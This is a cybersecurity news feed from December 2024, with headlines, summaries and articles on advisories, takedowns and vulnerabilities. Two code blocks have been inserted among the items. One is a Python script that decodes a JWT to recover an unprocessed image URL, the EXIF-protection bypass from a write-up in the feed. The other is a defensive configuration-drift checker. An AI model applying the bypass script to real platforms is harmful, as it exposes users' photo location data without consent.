In a similar vein, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also launched initiatives aimed at enhancing cybersecurity training for diverse groups. CISA's new learning platform, CISA Learning, provides free online courses to federal employees, contractors, military personnel, and the general public, emphasizing topics such as ethical hacking, cloud security, and malware analysis. Empowering individuals with the knowledge to defend themselves against cyber-attacks is a vital step in reducing the overall risk of digital exploitation. Likewise, CISA's expanded training programs aim to equip individuals with the skills to recognize and mitigate cyber risks, ensuring they are prepared to tackle a wide array of online threats. Through programs like these, Azercell is helping ensure that senior citizens are not left behind in the digital age. With more people relying on online services for everything from communication to banking, understanding the potential dangers of the internet is crucial. The training offered by Azercell is designed to be both accessible and relevant, addressing the unique challenges faced by older adults when interacting with technology. In parallel, CISA’s platform allows learners of all levels, from beginners to advanced, to gain critical skills in various cybersecurity domains, ensuring that everyone, regardless of their background, has access to the tools they need to stay safe online.
by The Cyber Express
2024-12-04 12:32:00
The most pressing challenges for CISOs and cyber security teams
by ComputerWeekly
2024-12-04 12:00:00
10 Ways To Harden Your Linux Containers Against Attacks
Learn practical strategies for protecting containerized applications on Linux.
by ITPro Today
2024-12-04 11:37:00
Joint Advisory Warns of PRC-Backed Cyber Espionage Targeting Telecom Networks
A joint advisory issued by Australia, Canada, New Zealand, and the U.S. has warned of a broad cyber espionage campaign undertaken by People's Republic of China (PRC)-affiliated threat actors targeting telecommunications providers. "Identified exploitations or compromises associated with these threat actors' activity align with existing weaknesses associated with victim infrastructure; no novel
by The Hacker News
2024-12-04 11:04:00
Veeam Issues Patch for Critical RCE Vulnerability in Service Provider Console
Veeam has released security updates to address a critical flaw impacting Service Provider Console (VSPC) that could pave the way for remote code execution on susceptible instances. The vulnerability, tracked as CVE-2024-42448, carries a CVSS score of 9.9 out of a maximum of 10.0. The company noted that the bug was identified during internal testing. "From the VSPC management agent machine, under
by The Hacker News
2024-12-04 11:00:30
Healthcare Cybersecurity in 2024: Building a Better Defence Against Rising Costs and Threats
Cybersecurity in the healthcare industry often faces a persistent and well-known dilemma. While the industry continues to be a major target for cybercrime, healthcare organizations have significant challenges in protecting sensitive patient data and maintaining continuity of operations with their limited budget. This blog discusses the state of cybersecurity in healthcare based on findings from the Picus Blue Report 2024, IBM's Cost of a Data Breach Report, and other leading sources to give actionable insights and help organizations enhance their defenses.
by Picus Security
2024-12-04 11:00:17
FTC says AI company Evolv 'falsely hyped' its security scanners
Evolv's scanners don't work as well as it led schools to believe. Here's what that means for children's safety.
by ZDNET Security
2024-12-04 10:55:00
Threat Spotlight: Phishing techniques to look out for in 2025
In this blog post Barracuda threat analysts look at how advanced phishing techniques are likely to evolve in 2025.
by Barracuda
2024-12-04 10:38:00
Critical SailPoint IdentityIQ Vulnerability Exposes Files to Unauthorized Access
A critical security vulnerability has been disclosed in SailPoint's IdentityIQ identity and access management (IAM) software that allows unauthorized access to content stored within the application directory. The flaw, tracked as CVE-2024-10905, has a CVSS score of 10.0, indicating maximum severity. It affects IdentityIQ versions 8.2, 8.3, 8.4, and other previous versions. IdentityIQ "allows
by The Hacker News
2024-12-04 10:18:00
Hackers Use Corrupted ZIPs and Office Docs to Evade Antivirus and Email Defenses
Cybersecurity researchers have called attention to a novel phishing campaign that leverages corrupted Microsoft Office documents and ZIP archives as a way to bypass email defenses. "The ongoing attack evades #antivirus software, prevents uploads to sandboxes, and bypasses Outlook's spam filters, allowing the malicious emails to reach your inbox," ANY.RUN said in a series of posts on X. The
by The Hacker News
2024-12-04 10:10:00
Post-COVID IT Hiring: Shifts in Workplace Culture, Technology, and Law
The IT labor market has evolved from an employee-driven landscape to one where employers regain control, reshaping hiring, remote work, and training strategies.
by ITPro Today
2024-12-04 10:04:47
Australia, Canada, New Zealand, and the U.S. warn of PRC-linked cyber espionage targeting telecom networks
Australia, Canada, New Zealand, and the U.S. warn of PRC-linked cyber espionage targeting telecom networks in a joint advisory. Australia, Canada, New Zealand, and the U.S. issued a joint advisory to warn of People’s Republic of China (PRC)-linked cyber espionage targeting telecom networks. “The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal […]
by Security Affairs
2024-12-04 10:00:37
Kaspersky Security Bulletin 2024. Statistics
The "Kaspersky Security Bulletin 2024. Statistics" report contains statistics on cyberthreats for the period from November 2023 through October 2024. It covers such threats as financial malware, ransomware, miners, malware for IoT and macOS, vulnerabilities and others.
by Securelist
2024-12-04 08:45:00
Fraud loss numbers are all over the place. The one sure thing is they’re rising fast.
A February 2024 report from the FTC reveals that Americans lost more than $10 billion dollars to scammers of all kinds during 2023. Learn more about this shocking statistic in this blog.
by Barracuda
2024-12-04 08:43:00
Ascension reduces operating loss as it rebounds from cyberattackA sweeping cyberattack this spring took the provider’s electronic health record offline for weeks and led to significant losses.
by Cybersecurity Dive
2024-12-04 08:35:00
Feds raise alarm on China-linked infiltration of telecom networksSalt Typhoon gained access to many telecom networks and stole large amounts of data, including audio and text of targeted people involved in government or politics.
by Cybersecurity Dive
2024-12-04 08:15:00
CISA, German cyber authorities warn Zyxel firewalls facing active exploitationAttackers have targeted dozens of companies with Helldown ransomware, researchers found.
by Cybersecurity Dive
2024-12-04 08:06:02
Europol Dismantles MATRIX: The Encrypted Messaging Service Fueling Global Crime
On December 3rd, 2024, Europol announced that a joint investigation between French and Dutch law enforcement authorities had successfully dismantled an encrypted messaging service used by criminals. The platform, known as MATRIX, had been facilitating various serious crimes, including international drug trafficking, arms trafficking, and money laundering. The operation, which was coordinated by law enforcement across several European countries, resulted in the seizure of over 40 servers, the arrest of multiple suspects, and the interception of millions of criminal messages. The investigation was a major step forward in combating the use of encrypted platforms for illegal activities.

MATRIX: A Sophisticated Criminal Platform
MATRIX, a messaging platform made by criminals for criminals, was first discovered on the phone of a convicted criminal involved in the 2021 murder of Dutch investigative journalist Peter R. de Vries. The journalist had gained fame for his work covering unsolved crimes. This discovery led Dutch authorities to initiate an extensive investigation into the platform, which was found to be more complex and sophisticated than other similar platforms such as Sky ECC and EncroChat. Unlike many encrypted communication services, MATRIX required users to be invited in order to join. It offered a range of encrypted features, including secure messaging, voice and video calls, and even anonymous web browsing. MATRIX also had its own currency system for users to pay for subscriptions, and the platform was primarily used on Google Pixel phones. This level of sophistication and exclusivity made it a popular choice among criminals.

The Role of International Cooperation
The dismantling of MATRIX highlights the importance of international cooperation in the fight against organized crime. Authorities from France, the Netherlands, Germany, Italy, Lithuania, and Spain worked together as part of a joint investigation team (JIT) coordinated through Eurojust. This cross-border collaboration allowed law enforcement agencies to exchange vital information and swiftly take coordinated action. For three months, investigators monitored activity on the platform, deciphering over 2.3 million messages in 33 different languages. The intercepted communications provided valuable intelligence, linking MATRIX users to various criminal activities, including international drug smuggling, arms deals, and large-scale money laundering schemes. On December 3rd, the operation led to the takedown of the platform's servers located across France and Germany. Additionally, authorities conducted raids in multiple countries, arresting three individuals. One suspect, the suspected owner and operator of MATRIX, a 52-year-old Lithuanian national, was apprehended in Spain. He had been working closely with a 30-year-old man from the Netherlands to run the platform.

Significant Seizures and Evidence
During the raids, police seized €145,000 ($152,000) in cash and approximately €500,000 ($527,000) in cryptocurrencies. Authorities also confiscated four vehicles, more than 970 mobile phones, and other equipment. The evidence collected during the operation will be crucial in ongoing investigations into the criminals who used MATRIX to facilitate illegal activities. In addition to the physical evidence, the seizure of the platform's servers gave law enforcement a significant opportunity to collect data related to the communications and transactions conducted via MATRIX. A splash page now appears on the platform's website, alerting users that their messages were intercepted by authorities. The page includes a warning: "It's not the first time and will not be the last time we are able to read the messages in real time."

Law Enforcement Involved
The dismantling of MATRIX involved the coordinated efforts of several European law enforcement agencies, including:
France: JUNALCO National Jurisdiction against Organised Crime; OFAC National Police Cybercrime Division
Netherlands: Team High Tech Crime of the National Investigations and Special Operations (NIS) of the Netherlands Police; Netherlands Public Prosecution Service
Germany: Frankfurt am Main Public Prosecutor General's Office – ZIT; German Federal Criminal Police, Serious and Organised Crime Division
Italy: National Antimafia Directorate (D.N.A.); Central Directorate for Anti-Drug Services (D.C.S.A.)
Lithuania: Prosecutor General's Office; Lithuanian Criminal Police Bureau
Spain: Central Investigative Courts 1 and 5 of the Audiencia Nacional; Spanish National Police
The operation was also supported by Europol's Operational Task Force, which was established to monitor criminal activity on encrypted platforms like MATRIX. The task force played a crucial role in providing technical and operational support during the investigation.

An Evolving Cybersecurity Landscape
The takedown of MATRIX adds to a growing list of encrypted criminal communication platforms that have been disrupted in recent years. Prior to MATRIX, law enforcement successfully dismantled Sky ECC and EncroChat, two other popular platforms used by criminals. These operations have demonstrated the ability of law enforcement agencies to infiltrate and shut down encrypted communication services that criminals rely on to carry out illegal activities. However, as criminals adapt to the disruption of their communication tools, law enforcement faces an increasingly fragmented landscape. Criminals have turned to less-established or custom-built encrypted platforms, which offer varying levels of security and anonymity. Despite this challenge, the successful takedown of MATRIX sends a strong message that authorities are constantly evolving their tactics to stay ahead of criminals.
by The Cyber Express
2024-12-04 07:56:06
U.S. CISA adds ProjectSend, North Grid Proself, and Zyxel firewalls bugs to its Known Exploited Vulnerabilities catalogU.S. Cybersecurity and Infrastructure Security Agency (CISA) adds ProjectSend, North Grid Proself, and Zyxel firewalls bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Proself versions before Ver5.62, Ver1.65, and Ver1.08 are vulnerable to XXE attacks, allowing unauthenticated attackers […]
by Security Affairs
2024-12-04 07:46:22
Docker/Kubernetes (K8s) Penetration Testing ChecklistDocker/Kubernetes (K8s) Penetration Testing involves identifying and assessing security vulnerabilities within containerized environments… Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-04 07:46:07
TryHackme’s Advent of Cyber 2024 — Day 03 WriteupDay 3: Even if I wanted to go, their vulnerabilities wouldn’t allow it. Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-04 07:46:03
Tricky & Simple EXIF protection Bypass
Hello Hackers! 👋 It's been a year and a half since my last write-up, so I thought let's share something simple yet interesting. I recently came across an intriguing vulnerability and thought I'd share it with you all. Let's dive in! For beginners or those unfamiliar with EXIF vulnerabilities, I recommend reviewing this article first before returning to the current one. As always there is a web application; this platform allows users to upload an image as their profile picture. However, I noticed that the image wasn't being replicated anywhere within the application's dashboard or services, so I moved on to explore other functionalities such as login and password reset. During the login process, after entering an email address, the application displayed the user's profile picture. I opened the image in a new tab, and the URL appeared as follows: https://pic.abc.com/eyJ----------------------JWT_token-------------------- If I pasted this URL into jimpl.com to retrieve EXIF data it did not show any location-specific data. However, I decided to investigate further. (Again, if you don't know about JWT tokens, go through this article.) I extracted the JWT token from the URL, navigated to jwt.io, and pasted the token there. In the token's header section, I discovered a different URL. I copied this new URL and pasted it into jimpl.com, where I was able to successfully retrieve the EXIF data associated with the image, effectively bypassing the EXIF protection mechanism. Isn't it interesting and simple? If you liked it do follow me on Twitter & LinkedIn. Tricky & Simple EXIF protection Bypass was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
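The decode step in the write-up above, done offline, as an added example that is mine and not the author's code. The token, hostnames and the `origin` header field are constructed for the example (the real token is elided in the write-up). The signature is deliberately not verified: a JWT is only base64url-encoded JSON, so anything placed in its header or payload is readable by whoever holds the URL, which is the whole point of the bypass. Reading the EXIF data from the recovered URL (jimpl.com in the write-up) is outside this snippet.

```python
"""Added example: decode a JWT lifted from an image URL (no signature check) and
look for origin URLs that leak the unprocessed upload. The token below is
constructed for this example; it is not the write-up's token."""
import base64
import json
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>\\]+")


def b64url_decode(segment):
    """JWT segments are base64url without padding; restore '=' before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token):
    """Return (header, payload) as dicts. The signature is deliberately NOT checked:
    the goal is to read what the token exposes, as the write-up does on jwt.io."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected a compact JWS with three dot-separated parts")
    return json.loads(b64url_decode(parts[0])), json.loads(b64url_decode(parts[1]))


def find_leaked_urls(token):
    """Every http(s) URL in the header or payload, tagged with the section it came from."""
    header, payload = decode_jwt_unverified(token)
    found = []
    for section_name, section in (("header", header), ("payload", payload)):
        found.extend((section_name, url) for url in URL_RE.findall(json.dumps(section)))
    return found


def origin_bypass_candidates(served_url, token):
    """URLs in the token that point at a different host than the one serving the
    'protected' image: candidates for fetching the original with EXIF intact."""
    served_host = urlparse(served_url).hostname
    return [url for _, url in find_leaked_urls(token) if urlparse(url).hostname != served_host]


def make_unsigned_token(header, payload):
    """Build a sample token. The third segment is a placeholder, not a real signature."""
    def enc(obj):
        raw = json.dumps(obj, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return f"{enc(header)}.{enc(payload)}.placeholder-signature"


# Constructed sample: a header carrying the origin of the unprocessed upload (the
# "different URL in the header" the write-up describes). Hostnames are assumptions.
SAMPLE_TOKEN = make_unsigned_token(
    {"alg": "HS256", "typ": "JWT", "origin": "https://cdn-origin.example.net/raw/photo.jpg"},
    {"sub": "user-123", "purpose": "profile-picture"},
)
SAMPLE_IMAGE_URL = "https://pic.example.com/" + SAMPLE_TOKEN

if __name__ == "__main__":
    print(find_leaked_urls(SAMPLE_TOKEN))
    print(origin_bypass_candidates(SAMPLE_IMAGE_URL, SAMPLE_TOKEN))
```

The fix on the application side is not a better token: it is stripping EXIF at upload time and never exposing a path to the unprocessed file, since any reference embedded in a client-visible token is effectively public.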
2024-12-04 07:45:54
Critical Bug: Deny Sign-In & Steal Sensitive Info on Behalf of VictimsRead free. Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-04 06:55:30
Telecoms on High Alert: New Cybersecurity Guidelines to Defend Against PRC-Affiliated Threats
The Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and their international partners have released a comprehensive set of guidelines aimed at enhancing the security of telecommunications infrastructure. The joint publication, titled Enhanced Visibility and Hardening Guidance for Communications Infrastructure, offers critical advice to network engineers and defenders tasked with protecting global communications networks from advanced persistent threats (APTs) tied to the People's Republic of China (PRC).

The Cyber Espionage Threat
The new guidance comes in the wake of warnings issued by CISA and the FBI about an ongoing, broad cyber espionage campaign conducted by PRC-affiliated threat actors. These actors have successfully infiltrated the networks of major telecommunications providers worldwide, compromising sensitive data and potentially jeopardizing national security, critical infrastructure, and private businesses. The objective of the campaign, as detailed by officials, is to extract valuable information for intelligence-gathering purposes. Jeff Greene, Executive Assistant Director for Cybersecurity at CISA, emphasized the seriousness of the threat: "The PRC-affiliated cyber activity poses a serious threat to critical infrastructure, government agencies, and businesses. This guide will help telecommunications and other organizations detect and prevent compromises by the PRC and other cyber actors."

A Call to Action for Network Defenders
The newly released guide outlines a series of best practices designed to help organizations strengthen their networks against cyber threats. While tailored primarily for the telecommunications sector, these recommendations are applicable to any organization operating critical infrastructure, including businesses with on-premises enterprise equipment. One of the central themes of the guidance is the importance of enhancing visibility within networks: the ability of network defenders to detect and analyze activity across their systems, including network traffic, user behaviors, and data flows. High visibility ensures that potential threats can be quickly identified and mitigated before they lead to serious breaches.

Strengthening Visibility in Communications Infrastructure
To improve visibility, CISA and the FBI recommend that network engineers implement strong monitoring systems and processes to detect anomalous behaviors or unauthorized changes in network configurations. These recommendations include:
Monitoring configuration changes: network engineers are advised to closely track changes to critical network devices like routers, firewalls, and switches, especially those that occur outside of established change management protocols. Unusual alterations, such as unauthorized route updates or the activation of weak protocols, should trigger alerts for immediate investigation.
Centralized configuration management: storing device configurations centrally, instead of relying on the devices themselves, provides a single trusted source of truth for network settings. Frequent testing and validation of configurations are also encouraged to ensure they remain secure and effective.
Monitoring user and service accounts: suspicious logins, particularly those from unknown or unexpected sources, should be closely monitored. It's also important to regularly review and disable inactive accounts to reduce the attack surface.
Secure logging and data analysis: implementing centralized logging, where log data is securely stored and can be easily analyzed, helps identify security incidents faster. Encrypted log transmission is essential to prevent tampering or interception.
By improving network visibility, defenders can identify threats early in their lifecycle and respond to them more effectively, reducing the risk of a successful compromise.

Hardening Systems and Devices
Alongside increasing visibility, the guide stresses the importance of hardening network systems and devices: reducing vulnerabilities through secure configuration practices and implementing defense-in-depth strategies that limit potential entry points for cyber actors. Key recommendations for hardening devices include:
Out-of-band management: network engineers should manage devices through a physically separate management network, isolated from the operational data flow. This limits the potential for lateral movement by attackers in case of a compromised device.
Strict access controls: implementing default-deny access control lists (ACLs) and network segmentation can block unauthorized traffic and isolate critical systems. Devices with sensitive functions, such as DNS servers or email servers, should be placed in a demilitarized zone (DMZ) to further reduce the risk of exposure.
Use of strong encryption: strong encryption practices should be employed across all traffic, particularly for VPNs and remote management tools. Vulnerabilities in outdated encryption protocols should be mitigated by using the latest cryptographic standards, such as AES-256 and TLS 1.3.
Disabling unnecessary services: services like Telnet, FTP, and SSH version 1 should be disabled, as they are often targeted by attackers looking for weak entry points into the network.
Regular updates and patching: it is essential to keep all devices and software up to date with the latest security patches. Additionally, network defenders should regularly monitor vendor announcements for end-of-life (EOL) notifications and upgrade equipment accordingly.
By hardening network devices and systems, organizations can make it significantly more difficult for threat actors to exploit vulnerabilities and gain unauthorized access to critical networks.

CISA, NSA, and FBI: A Unified Effort to Safeguard Critical Infrastructure
In conclusion, the cybersecurity agencies behind the guide, CISA, NSA, and FBI, are urging all organizations, especially those involved in critical infrastructure, to adopt these best practices. As Jeff Greene highlighted, it is crucial for software manufacturers to integrate Secure by Design principles into their development processes to ensure that future vulnerabilities are minimized. Bryan Vorndran, Assistant Director of the FBI's Cyber Division, also stressed the importance of collaborative action: "Together with our interagency partners, the FBI issued guidance to enhance the visibility of network defenders and to harden devices against PRC exploitation." Ultimately, this guidance not only aims to defend against PRC-affiliated actors but also to enhance the overall security posture of telecommunications infrastructure and other critical sectors. By implementing these measures, network defenders can better prepare for and respond to evolving cyber threats, helping to protect sensitive data and maintain the integrity of essential services.
by The Cyber Express
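The configuration-change and centralized-configuration recommendations in the telecom guidance above reduced to a check, as an added example that is mine and not code from the guidance or from The Cyber Express: diff the running configuration pulled from a device against the golden copy held centrally, and label each changed line with the alert class the guidance calls out (route changes, weak protocols such as Telnet, new local accounts). Both configurations are constructed IOS-style samples; the pattern list is an assumption about syntax and needs tuning per vendor.

```python
"""Added example: detect configuration drift on a network device by diffing the
running config against a centrally stored golden copy. Both configs are
constructed IOS-style samples, not real device output."""
import difflib
import re

# Patterns (assumed IOS-style syntax) matched against changed lines; first hit wins.
SUSPICIOUS_PATTERNS = [
    (r"^ transport input .*\btelnet\b", "Telnet enabled on VTY lines"),
    (r"^ transport input ", "VTY transport changed"),
    (r"^ip route ", "static route added or changed"),
    (r"^username ", "local account added or changed"),
    (r"^ip ssh version 1\b", "SSH version 1 enabled"),
    (r"^snmp-server community ", "SNMP community changed"),
    (r"^(ip |ipv6 )?access-list ", "ACL modified"),
    (r"^interface Tunnel", "tunnel interface added or changed"),
]

GOLDEN_CONFIG = """\
hostname edge-rtr-01
ip ssh version 2
username netops privilege 15 secret 9 REDACTED
snmp-server community ReadOnlyComm RO 10
ip route 10.20.0.0 255.255.0.0 10.0.0.2
line vty 0 4
 transport input ssh
"""

# Running config with three out-of-process changes: a new privileged account,
# a new default route and Telnet re-enabled on the VTY lines.
RUNNING_CONFIG = """\
hostname edge-rtr-01
ip ssh version 2
username netops privilege 15 secret 9 REDACTED
username svc_backup privilege 15 secret 5 REDACTED
snmp-server community ReadOnlyComm RO 10
ip route 10.20.0.0 255.255.0.0 10.0.0.2
ip route 0.0.0.0 0.0.0.0 203.0.113.9
line vty 0 4
 transport input telnet ssh
"""


def classify_change(line):
    """Map one changed config line to an alert class."""
    for pattern, reason in SUSPICIOUS_PATTERNS:
        if re.match(pattern, line):
            return reason
    return "unexpected change"


def config_drift(golden, running):
    """Return [(op, line, reason)] where op is '+' (only in running) or '-' (only in golden).
    An empty list means the device matches its golden copy."""
    findings = []
    for line in difflib.unified_diff(golden.splitlines(), running.splitlines(), lineterm="", n=0):
        if line.startswith(("---", "+++", "@@")):
            continue  # file and hunk headers, not config lines
        findings.append((line[0], line[1:], classify_change(line[1:])))
    return findings


def needs_investigation(findings):
    """Findings that hit a specific pattern; 'unexpected change' still deserves review
    but would be routed to the change-management queue rather than paged."""
    return [f for f in findings if f[2] != "unexpected change"]


if __name__ == "__main__":
    for op, line, reason in config_drift(GOLDEN_CONFIG, RUNNING_CONFIG):
        print(f"{op} {line!r:55} -> {reason}")
```

Run this from a scheduled job that pulls the running config over the out-of-band management network; any non-empty result outside a change window is the alert the guidance asks for, and the golden copy in version control is the "single trusted source of truth" it describes.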
2024-12-04 06:27:07
Save Big This Season: Practical Tips for Stress-Free ShoppingBlack Friday is the best, right? Well, sometimes. Deals everywhere, and chaos too. I’ve had moments feeling so lost in the sea of discounts it almost made me give up shopping altogether. But over the years, I’ve learned a few tricks. Here’s how I handle it, step by step—no fluff, just what works. From figuring out what I want in advance to using apps that do the heavy lifting, these tips can help make Black Friday more about saving than stressing. 1. Start with Research Before I even think about shopping, I get organized. Not too much work, but enough to save headaches later. I jot down exactly what I want: brands, sizes, model numbers, and all that. Last year, I skipped this and wasted hours online. Learned my lesson. Now, I look at online reviews, compare specs, and even save product links on my phone. Honestly, the key is knowing what to expect price-wise. Retailers are sneaky. “50% off” isn’t a deal if they jacked up prices last month. I bookmark price trackers and keep an eye out for weeks before the sales start. Apps like Honey or CamelCamelCamel are game-changers. 2. Subscribe to Newsletters (Yes, Really) Some people hate spam. Me? I use it. Signing up for store emails means you hear about discounts first. I don’t check them daily, but during the Black Friday season, those emails are pure gold. Some stores send early access links to deals. I got my headphones that way last year—saved $70 before most people even knew they were discounted. A quick tip: turn on app notifications for stores like Target or Amazon. I used to hate push alerts, but now they let me catch limited-time offers I’d otherwise miss. Life’s too short to be refreshing pages all day. 3. The Coupons App Is a Lifesaver Ever heard of The Coupons App? It’s fantastic. I downloaded it when a friend wouldn’t stop talking about it, and wow. It doesn’t just find promo codes—it applies them for you. It’s like magic. 
I’ve even snagged freebies nearby, like a free coffee once. The app also tracks price drops. That’s how I got a laptop at $150 off without stalking sales all month. No app is perfect, though. Sometimes, codes don’t work, or deals are region-specific. But on the whole, it’s a superb choice. Little savings add up over time. 4. Loyalty Programs Pay Off I used to ignore loyalty cards, thinking they weren’t worth it. Big mistake. Stores like Old Navy or Macy’s give members discounts others don’t get. A lot of them let you earn points too, which can translate to free money later. I’ve scored free shirts and even got a $20 store credit once—just for shopping during Black Friday. 5. Price Comparison: The Secret Weapon Impulse buys are tempting, but not every sale is as good as it looks. I use apps like Google Price Scanner to compare prices. It’s quick and makes me feel like I’m not being ripped off. Did you know some stores price-match too? Best Buy does, but only if you ask. I’ve walked up to customer service and gotten refunds on price differences just because I checked. One more thing: don’t stop comparing prices after Black Friday. Cyber Monday often has better deals on tech. Missed the sale? No worries, because stores tend to extend discounts all weekend. 6. Understand Return Policies Returns can save you big time. Keep every receipt, digital or paper. Why? If a price drops after you buy something, you can sometimes get a refund for the difference. I’ve done this at Target and even Walmart. Some stores give you until January to return items bought during holiday sales. It’s like a safety net. If I find something cheaper later, I’ll just return the pricier version. One little hack: buy the lower-priced item and return the expensive one. A bit tedious but totally worth it for bigger savings. 7. Stick to Online Shopping Shopping in-store is rarely worth it anymore. I’ve skipped the crowds the past few years and don’t regret it. 
Online, I can compare deals from my couch—no lines, no pushing, no stress. Sites even offer web-exclusive sales that beat in-store prices. Just don’t forget to double-check shipping deadlines. Missed packages are the worst. 8. Timing Is Everything Not every deal drops on Black Friday. Some stores start sales early—like mid-November. If I spot a decent price a week before, I’ll buy it. Why risk waiting for a better deal when I might lose out completely? Also, don’t sleep on the Wednesday before Black Friday. Weird, but true: it’s often quieter and less competitive. 9. Doorbusters: Worth It? Let me be real: I’m over doorbusters. Camping out all night for one TV? Not my vibe. But if you do go in person, get there at dawn—or earlier. The crowds aren’t as crazy as they used to be, but the best deals still vanish fast. Once, I tried going mid-morning, and half the stock was gone. Never again. 10. Don’t Forget Gift Cards If you have unused gift cards lying around, now’s the time to use them. I’ve bought discounted cards from websites and used them during sales for extra savings. Think about it: buying $50 worth of stuff but only paying $40 because of a gift card? Feels like winning twice. 11. Have Fun, But Set Limits Black Friday is electrifying, but it’s easy to splurge. I always set a budget now. Not just for big purchases, but for everything. Snacks, small gifts, stocking stuffers—it all adds up. The goal is to save money, not blow it. Black Friday doesn’t have to be stressful. Do a little prep, use the right tools, and focus on what you need, not just what’s cheap. That’s how I make it through without feeling overwhelmed—or broke.
by The Cyber Express
2024-12-04 00:56:31
Horns&Hooves Campaign Delivers RATs to Russian Retail EntitiesSummary: Researchers from Kaspersky's Securelist revealed new details regarding the Horns&Hooves cyber campaign, active since March 2023, which targeted over a thousand users and businesses in Russia (including retailers), using malicious JScript (JS) scripts disguised as legitimate email attachments. These scripts deploy the legitimate remote administration tool NetSupport for malicious purposes, granting attackers remote access...
by RH-ISAC
2024-12-04 00:00:00
CrowdStrike Announces Falcon Identity Protection for AWS IAM Identity Center
by CrowdStrike
2024-12-04 00:00:00
CrowdStrike Showcases Cloud Security Innovation and Leadership at AWS re:Invent
by CrowdStrike
2024-12-03 23:25:24
SecureG, CTIA Project Secures Business Phone CallsBCID mitigates the risk of consumers being harmed by fraud and bad actors by vetting to deliver a trusted, branded call experience for consumers.
by Dark Reading
2024-12-03 22:34:37
Misconfigured WAFs Heighten DoS, Breach RisksOrganizations that rely on their content delivery network provider for Web application firewall services may be inadvertently leaving themselves open to attack.
by Dark Reading
2024-12-03 22:31:42
BigID Releases Data Activity Monitoring to Extend DDR, Detect Malicious Actors, and Strengthen Data Security Posture
by Dark Reading
2024-12-03 22:25:00
Technical Analysis of FPNTX Digital Skimmer Found on eCommerce SiteOn 3 December 2024, the RH-ISAC intel team was informed about a possible digital skimmer that may be present on an unnamed e-commerce website. JJ Josing, Principal Threat Researcher at the RH-ISAC, started his initial investigation into this incident. Our investigation discovered a script block containing heavily obfuscated JavaScript in the HTML of the checkout...
by RH-ISAC
2024-12-03 22:20:52
KnowBe4 Releases the Latest Phishing Trends in Q3 2024 Phishing Report
by Dark Reading
2024-12-03 21:19:05
Extending Falco for SalesforceAs many in the CNCF community know, Falco’s flexibility can be extended through Plugins, allowing users to build custom integrations... The post Extending Falco for Salesforce appeared first on Sysdig.
by Sysdig
2024-12-03 21:13:47
Note From the Editor-in-ChiefA change in ownership and what it means for our readers.
by Dark Reading
2024-12-03 20:49:31
AI chatbot provider exposes 346,000 customer files, including ID documents, resumes, and medical recordsAI chatbot provider WotNot left a cloud storage bucket exposed that contained almost 350,000 files, including personally identifiable information.
by Malwarebytes Labs
2024-12-03 20:43:00
From deals to DDoS: exploring Cyber Week 2024 Internet trendsHow significant are Cyber Week shopping days on the Internet? Is it a global phenomenon? Does E-commerce interest peak on Black Friday or Cyber Monday, and are attacks increasing during this time? We try to answer these questions and more.
by Cloudflare
2024-12-03 20:25:34
Decade-Old Cisco Vulnerability Under Active ExploitCisco encourages users to update to an unaffected version of its Adaptive Security Appliance (ASA) software since there are no workarounds for the 2014 vulnerability.
by Dark Reading
2024-12-03 20:19:37
With Threats to Encryption Looming, Signal’s Meredith Whittaker Says ‘We’re Not Changing’At WIRED’s The Big Interview event, the president of the Signal Foundation talked about secure communications as critical infrastructure and the need for a new funding paradigm for tech.
by WIRED Security News
2024-12-03 19:43:27
Malicious Google Ads Target Users Seeking Solutions to Printer ProblemsScammers are abusing Google ads to target users searching for help with printer problems, according to researchers at Malwarebytes.
by KnowBe4
2024-12-03 19:43:22
Phishing Attacks Impersonating Big Brands Starts to Zero in on Just One BrandThe latest data on brand phishing trends shows one brand dominating quarter over quarter, but also continuing to take on a larger share of the brand impersonation.
by KnowBe4
2024-12-03 19:30:00
I deleted thousands of tweets from X with this new tool - for freeNow you can easily migrate from X with this powerful tool that deletes tweets, likes, and DMs, while backing up your data for a fresh start elsewhere.
by ZDNET Security
2024-12-03 19:18:29
FTC Says Data Brokers Unlawfully Tracked Protesters and US Military PersonnelThe FTC is targeting data brokers that monitored people’s movements during protests and around US military installations. But signs suggest the Trump administration will be far more lenient.
by WIRED Security News
2024-12-03 19:18:23
Undeclared functionality in machine learning systemsHidden logic, data poisoning, and other targeted attack methods using AI systems.
by Kaspersky
2024-12-03 19:10:33
And the Winner of The Inside Man Biggest Fan Contest 2024 is…It’s been several weeks since the exciting premiere of The Inside Man - Season 6 in St. Petersburg, Fl. If you missed my post, I talked about this magical night where we released the latest blockbuster season of this award winning security awareness series.
by KnowBe4
2024-12-03 19:00:00
He Got Banned From X. Now He Wants to Help You Escape, TooWhen programmer Micah Lee was kicked off X for a post that offended Elon Musk, he didn't look back. His new tool for saving and deleting your X posts can give you that same sweet release.
by WIRED Security News
2024-12-03 18:42:31
Repeat offenders drive bulk of tech support scams via Google AdsConsumers are getting caught in a web of scams facilitated by online ads often originating from the same perpetrators.
by Malwarebytes Labs
2024-12-03 18:31:48
Data Leak Exposes Millions of Top Corporations Employee RecordsA new wave of data leaks by the cybercriminal known as “Nam3L3ss” has surfaced, exposing sensitive employee information from some of the world's largest companies. The leaked databases, stemming from previous CL0P ransomware attacks exploiting the MOVEit vulnerability (CVE-2023-34362), include millions of records detailing corporate hierarchies, personal data, and internal identifiers. The leaks, posted on … The post Data Leak Exposes Millions of Top Corporations Employee Records appeared first on CyberInsider.
by Cyber Insider
2024-12-03 18:21:00
